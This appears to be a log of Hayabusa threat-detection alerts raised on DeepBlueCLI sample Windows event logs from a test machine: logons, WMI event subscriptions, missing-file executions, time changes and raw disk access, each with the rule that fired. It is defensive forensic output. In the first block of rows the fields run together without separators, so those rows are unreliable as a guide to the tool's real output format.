5222014-11-24 14:08:08.126 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5232014-11-24 14:08:08.126 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7c0 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5242014-11-24 14:08:08.126 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7f0 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5252014-11-24 14:08:08.126 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x2b7c0rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5262014-11-24 14:09:50.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
5272014-11-24 14:09:50.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
5282014-11-24 14:11:00.564 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5292014-11-24 14:11:00.564 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5302014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5312014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5322014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5332014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5342014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5352014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5362014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5372014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5382014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5392014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5402014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5412014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5422014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5432014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5442014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5452014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5462014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5472014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5482014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5492014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5502014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5512014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5522014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5532014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5542014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5552014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5562014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5572014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5582014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5592014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5602014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5612014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5622014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5632014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5642014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5652014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5662014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5672014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5682014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5692014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5702014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5712014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5722014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5732014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5742014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5752014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5762014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5772014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5782014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5792014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5802014-11-26 02:18:43.547 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5812014-11-26 02:18:43.547 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5822014-11-26 02:18:43.562 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5832014-11-26 02:23:49.093 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5842014-11-26 02:25:02.877 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5852014-11-26 02:25:02.877 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5862014-11-26 02:25:02.877 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5872014-11-26 02:48:26.739 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5882014-11-26 02:48:26.739 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5892014-11-26 02:48:26.739 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5902014-11-26 02:57:33.848 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5912014-11-26 02:57:33.848 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5922014-11-26 02:57:33.848 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5932014-11-26 03:01:39.454 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5942014-11-26 03:01:39.454 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5952014-11-26 03:01:39.454 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5962014-11-26 03:02:36.847 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5972014-11-26 03:02:36.847 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5982014-11-26 03:02:36.847 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5992014-11-26 03:05:21.128 +09:00IE8Win79mediumRaw Disk Access Using Illegitimate Toolsrules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 03:08:12.894 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf564 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf598 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 06:57:07.814 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27008 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27038 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12048 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12070 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
